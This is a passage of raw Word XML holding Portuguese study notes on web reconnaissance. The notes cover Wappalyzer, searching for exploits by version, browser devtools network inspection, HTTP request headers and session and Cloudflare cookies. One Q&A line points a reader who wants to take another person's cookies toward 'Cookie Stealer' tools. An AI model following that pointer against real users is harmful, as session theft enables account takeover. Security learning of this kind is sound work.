    <w:p w14:paraId="50CDFC9F" w14:textId="71BADC7E" w:rsidR="002E7751" w:rsidRPr="00711C8C" w:rsidRDefault="00EB4CC8" w:rsidP="002E7751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noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36164F74" w14:textId="63824288" w:rsidR="00733574" w:rsidRPr="00711C8C" w:rsidRDefault="00EB4CC8" w:rsidP="008F3C3E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noProof/>
        </w:rPr>
        <w:tab/>
        <w:t>6 – Tentar identificar as tecnologias identificadas na aplicação.</w:t>
      </w:r>
      <w:r w:rsidR="00706D15" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Tem uma própria extensão no navegador chamada </w:t>
      </w:r>
      <w:r w:rsidR="00706D15" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>“Wappalyzer”</w:t>
      </w:r>
      <w:r w:rsidR="00706D15" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t>, consegue identificar muitas informações.</w:t>
      </w:r>
      <w:r w:rsidR="00DF2CEC" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Pode verificar as versões e a realizar a busca por vulnerabilidades</w:t>
      </w:r>
      <w:r w:rsidR="00BB6F5E" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t>/exploits</w:t>
      </w:r>
      <w:r w:rsidR="008F3C3E" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD8C856" w14:textId="7A4A8162" w:rsidR="008F3C3E" w:rsidRPr="00711C8C" w:rsidRDefault="008F3C3E" w:rsidP="008F3C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D837A7" w14:textId="0EA803E8" w:rsidR="008F3C3E" w:rsidRPr="00711C8C" w:rsidRDefault="008F3C3E" w:rsidP="008F3C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7335F3C0" w14:textId="013B4712" w:rsidR="008F3C3E" w:rsidRPr="00711C8C" w:rsidRDefault="008F3C3E" w:rsidP="008F3C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE3D1EA" w14:textId="0A16672C" w:rsidR="008F3C3E" w:rsidRPr="00711C8C" w:rsidRDefault="008F3C3E" w:rsidP="008F3C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A2FB56" w14:textId="77777777" w:rsidR="008F3C3E" w:rsidRPr="00711C8C" w:rsidRDefault="008F3C3E" w:rsidP="008F3C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30DE2B6E" w14:textId="173F383F" w:rsidR="008F3C3E" w:rsidRPr="00711C8C" w:rsidRDefault="00711C8C" w:rsidP="008F3C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Avert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82452C" wp14:editId="036BD603">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1673520</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-750850</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1928939" cy="2126512"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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939" cy="212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14802" w14:textId="77777777" w:rsidR="008F3C3E" w:rsidRPr="00711C8C" w:rsidRDefault="008F3C3E" w:rsidP="008F3C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31CE830D" w14:textId="77777777" w:rsidR="008F3C3E" w:rsidRPr="00711C8C" w:rsidRDefault="008F3C3E" w:rsidP="008F3C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="709ADD80" w14:textId="77777777" w:rsidR="008F3C3E" w:rsidRPr="00711C8C" w:rsidRDefault="008F3C3E" w:rsidP="008F3C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B146CAD" w14:textId="77777777" w:rsidR="008F3C3E" w:rsidRPr="00711C8C" w:rsidRDefault="008F3C3E" w:rsidP="008F3C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26E156E7" w14:textId="77777777" w:rsidR="008F3C3E" w:rsidRPr="00711C8C" w:rsidRDefault="008F3C3E" w:rsidP="008F3C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6F8978" w14:textId="77777777" w:rsidR="008F3C3E" w:rsidRPr="00711C8C" w:rsidRDefault="008F3C3E" w:rsidP="008F3C3E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B17601C" w14:textId="77777777" w:rsidR="00711C8C" w:rsidRPr="00711C8C" w:rsidRDefault="00711C8C" w:rsidP="00733574">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717EE494" w14:textId="562CCB13" w:rsidR="001A3087" w:rsidRPr="00711C8C" w:rsidRDefault="001A3087" w:rsidP="002E7751">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4616723B" w14:textId="5E7CB846" w:rsidR="000B33BD" w:rsidRPr="00711C8C" w:rsidRDefault="001A3087" w:rsidP="000B33BD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noProof/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">7 </w:t>
      </w:r>
      <w:r w:rsidR="00D05CA4" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="008F3C3E" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D05CA4" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Analisar como funciona o trafego de rede da aplicação, apertando </w:t>
      </w:r>
      <w:r w:rsidR="00D05CA4" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>F12</w:t>
      </w:r>
      <w:r w:rsidR="00D05CA4" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">, você abre o local do desenvolvedor. Em </w:t>
      </w:r>
      <w:r w:rsidR="00D05CA4" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">“Network”, </w:t>
      </w:r>
      <w:r w:rsidR="00D05CA4" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t>você consegue analisar as requisições que são enviadas ao servidor (Request Headers).  Clicando em Raw, você vê a requisição por completo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E3B8A1" w14:textId="77777777" w:rsidR="000B33BD" w:rsidRPr="00711C8C" w:rsidRDefault="000B33BD" w:rsidP="000B33BD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CAC0228" w14:textId="3DDB696C" w:rsidR="00D05CA4" w:rsidRPr="00711C8C" w:rsidRDefault="00D05CA4" w:rsidP="00DF2CEC">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC0D751" w14:textId="723A7EDB" w:rsidR="008C0660" w:rsidRPr="00711C8C" w:rsidRDefault="00D05CA4" w:rsidP="00BF74C5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44624349" wp14:editId="0411C9E6">
            <wp:extent cx="6466323" cy="299736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1754" b="10512"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6492383" cy="3009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1A278" w14:textId="76A29428" w:rsidR="008C0660" w:rsidRPr="00711C8C" w:rsidRDefault="008C0660" w:rsidP="00D05CA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="561AB612" w14:textId="77777777" w:rsidR="008C0660" w:rsidRPr="00711C8C" w:rsidRDefault="008C0660" w:rsidP="00D05CA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DDFC2CF" w14:textId="4C41627B" w:rsidR="00711C8C" w:rsidRPr="00711C8C" w:rsidRDefault="000B33BD" w:rsidP="00711C8C">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc156597596"/>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Headers da requisição</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="4702682A" w14:textId="4262E0A9" w:rsidR="000B33BD" w:rsidRPr="00711C8C" w:rsidRDefault="000B33BD" w:rsidP="00D05CA4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66517F38" w14:textId="59C7C4E7" w:rsidR="000B33BD" w:rsidRDefault="008C0660" w:rsidP="008C0660">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10516313" wp14:editId="72B2C9A5">
            <wp:extent cx="5400040" cy="2223135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145E" w14:textId="77777777" w:rsidR="00711C8C" w:rsidRDefault="00711C8C" w:rsidP="008C0660">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B222EC2" w14:textId="77777777" w:rsidR="00711C8C" w:rsidRPr="00711C8C" w:rsidRDefault="00711C8C" w:rsidP="008C0660">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD9AF21" w14:textId="3D205D54" w:rsidR="008C0660" w:rsidRPr="00711C8C" w:rsidRDefault="008C0660" w:rsidP="008C0660">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02CC5C00" w14:textId="20EF4875" w:rsidR="00DF2CEC" w:rsidRDefault="000928EE" w:rsidP="00B007BE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc156597597"/>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cada header acima, vai salvar uma informação</w:t>
      </w:r>
      <w:r w:rsidR="00562896" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="4459AE32" w14:textId="77777777" w:rsidR="006B76C6" w:rsidRPr="006B76C6" w:rsidRDefault="006B76C6" w:rsidP="006B76C6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72358DF9" w14:textId="6D810E52" w:rsidR="006B76C6" w:rsidRPr="006B76C6" w:rsidRDefault="006B76C6" w:rsidP="006B76C6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B76C6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Gostaria de saber se tem como pegar os cookies de outra pessoa na página alvo?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286EED64" w14:textId="7CCBB0EA" w:rsidR="006B76C6" w:rsidRPr="006B76C6" w:rsidRDefault="006B76C6" w:rsidP="006B76C6">
      <w:pPr>
        <w:ind w:firstLine="1842"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">R: </w:t>
      </w:r>
      <w:r w:rsidRPr="006B76C6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t>Pesquise por ferramentas chamadas</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006B76C6">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cookie Stealer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4345D981" w14:textId="77777777" w:rsidR="000928EE" w:rsidRPr="00711C8C" w:rsidRDefault="000928EE" w:rsidP="000928EE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085F6F0E" w14:textId="2EAFB8D7" w:rsidR="000928EE" w:rsidRPr="00711C8C" w:rsidRDefault="000928EE" w:rsidP="000928EE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>Host:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Salva para onde vai a requisição.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422364A3" w14:textId="33F4718D" w:rsidR="000928EE" w:rsidRPr="00711C8C" w:rsidRDefault="000928EE" w:rsidP="00354AE2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>User-Agent:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Mostra quem é o agente que está fazendo essa requisição, se é um Ch</w:t>
      </w:r>
      <w:r w:rsidR="002512A2">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t>ro</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t>me, Firefox ou outros agentes como um bot, por exemplo.</w:t>
      </w:r>
      <w:r w:rsidR="006D1985" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D1985" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>(Bastante utilizado para verificar se a requisição está sendo feita por um Android, e carregar uma tela responsiva.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1B4110" w14:textId="0858BA46" w:rsidR="00DF2CEC" w:rsidRPr="00711C8C" w:rsidRDefault="00562896" w:rsidP="00DF2CEC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>Accept:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Mostra os tipos de respostas na qual ele irá aceitar;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A27FF66" w14:textId="09AF5E44" w:rsidR="00562896" w:rsidRPr="00711C8C" w:rsidRDefault="00562896" w:rsidP="00DF2CEC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>Accept-Language:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Mostra o tipo de linguagem da resposta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108F3324" w14:textId="18BCFBCB" w:rsidR="00562896" w:rsidRPr="00711C8C" w:rsidRDefault="00562896" w:rsidP="00DF2CEC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>Accept-Encoding:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> Mostra o tipo da compactação da resposta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FB2785" w14:textId="3F16893F" w:rsidR="00562896" w:rsidRPr="00711C8C" w:rsidRDefault="00562896" w:rsidP="00DF2CEC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t>Connection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> O tipo de conexão da resposta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16627095" w14:textId="216CB625" w:rsidR="00A020D0" w:rsidRPr="00711C8C" w:rsidRDefault="00562896" w:rsidP="00A020D0">
      <w:pPr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  <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(O mais importante):</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">é um header que guarda várias informações, ele mostra pro servidor se o usuário está autenticado ou não, </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PHPSESSID=dsg8446556sdsd.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37174093" w14:textId="77777777" w:rsidR="00A020D0" w:rsidRPr="00711C8C" w:rsidRDefault="00A020D0" w:rsidP="00A020D0">
      <w:pPr>
        <w:ind w:firstLine="1842"/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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exemplo: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12150E10" w14:textId="77777777" w:rsidR="00A020D0" w:rsidRPr="00711C8C" w:rsidRDefault="00A020D0" w:rsidP="00A020D0">
      <w:pPr>
        <w:ind w:firstLine="1842"/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</w:rPr>
        <w:t xml:space="preserve">PHPSESSID, identifica o usuário, vamos imaginar que eu fiz login no facebook, se eu fechar o navegador e abrir de novo, eu vou já estar logado, ele salva os cookies de sessão. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC93A4D" w14:textId="77777777" w:rsidR="00A020D0" w:rsidRPr="00711C8C" w:rsidRDefault="00A020D0" w:rsidP="00A020D0">
      <w:pPr>
        <w:ind w:firstLine="1842"/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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Como funciona?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECE888B" w14:textId="77777777" w:rsidR="00A020D0" w:rsidRPr="00711C8C" w:rsidRDefault="00A020D0" w:rsidP="00A020D0">
      <w:pPr>
        <w:ind w:firstLine="1842"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>A partir do momento em que eu realizo o login, o site vai gerar um cookie para o meu navegador e ele vai salvar a sessão logada.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECB44B2" w14:textId="77777777" w:rsidR="00A020D0" w:rsidRPr="00711C8C" w:rsidRDefault="00A020D0" w:rsidP="00A020D0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B9935EB" w14:textId="104FF70C" w:rsidR="00A020D0" w:rsidRPr="00711C8C" w:rsidRDefault="00A020D0" w:rsidP="008500FD">
      <w:pPr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Os cookies começando com </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cf_</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>..., são os cookies do CloudFlare. Sempre quando você entra no site pela primeira vez, o CloudFlare vai verificar sua requisição, ele verifica se é um navegador</w:t>
      </w:r>
      <w:r w:rsidR="00503986">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> e </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t>se está rodando JavaScript, etc.</w:t>
      </w:r>
      <w:r w:rsidR="00AF5760" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> Se tudo estiver ok, ele permite o acesso e salva sua sessão de cookies.</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
